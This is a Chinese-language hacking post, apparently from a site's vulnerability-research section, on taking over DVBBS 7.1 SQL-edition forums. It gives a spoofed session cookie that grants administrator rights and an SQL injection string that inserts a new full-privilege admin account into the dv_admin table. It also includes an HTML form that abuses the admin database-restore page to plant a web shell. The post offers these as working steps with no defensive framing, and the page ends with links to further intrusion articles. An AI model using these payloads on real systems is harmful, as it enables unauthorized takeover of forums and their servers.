最新dvbbs 7.1sql提权得shell

所属分类: 实用技巧 / 漏洞研究 阅读数: 518
收藏 0 赞 0 分享
dvbbs 7.1跳过死循环,按linzi的方法只能是有一个管理权限,而只是新手上路的等级  
如果是sql版,就不好暴库,事实上好像只需要抓取SESSION即可,不要登陆任何用户。  
欺骗时不要关闭假死的那个ie  

这个是死循环的SESSION:  
ASPSESSIONIDQCTRTQAC=HOPNBJLCKHGDDPNAAIOCKGCJ  

加入或替换到可以欺骗的浏览器的cookie栏。  
List=list5+and+1%3D2=1&list5+and+1%3D1=1&list1+and+1%3D2=1&list1+and+1%3D1=1&list3+and+1%3D2=1&list3+and+1%3D1=1; ASPSESSIONIDQCTRTQAC=HOPNBJLCKHGDDPNAAIOCKGCJ  

然后点任何板块  
就能发现,你欺骗的用户和等级都是管理员了。  


后台管理员可以通过用户奖励那里加入  

test','127.0.0.1',5) ;insert into dv_admin (username,[password],flag,adduser) values ('jinsdb','4ac646c9e65a1769','1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37','jinsdb');--  
dvbbs7.1 sql 后台得shell  

<form action="http://127.0.0.1/bbs/admin/data.asp?act...t=Restore" method="post">  
<p>已上传文件的位置:<input name="Dbpath" type="text" size="80"></p>  
<p>要复制到的位置:<input name="backpath" type="text" size="80"></p>  
<p><input type="submit" value="提交"></p>  
</form>  

好像7.1的usercookies只是个幌子  
根本没必要  
去掉了也一样可以使用  

搞笑  
更多精彩内容其他人还在看

IDS入侵特征库创建实例解析

IDS入侵特征库创建实例解析
收藏 0 赞 0 分享

Access的跨库查询 (图)

Access的跨库查询 (图)
收藏 0 赞 0 分享

针对ACCESS漏洞又一发现

针对ACCESS漏洞又一发现
收藏 0 赞 0 分享

入侵之中杀防火墙进程的代码

入侵之中杀防火墙进程的代码
收藏 0 赞 0 分享

linux的病毒发展史及分类

linux的病毒发展史及分类
收藏 0 赞 0 分享

特络伊木马如何利用文件关联和设置名

特络伊木马如何利用文件关联和设置名
收藏 0 赞 0 分享

对RPC DCOM 蠕虫的设想

对RPC DCOM 蠕虫的设想
收藏 0 赞 0 分享

shell.application对象的漏洞描述

shell.application对象的漏洞描述
收藏 0 赞 0 分享

QQ尾巴病毒核心技术的实现

QQ尾巴病毒核心技术的实现
收藏 0 赞 0 分享

游戏外挂分析

游戏外挂分析
收藏 0 赞 0 分享
查看更多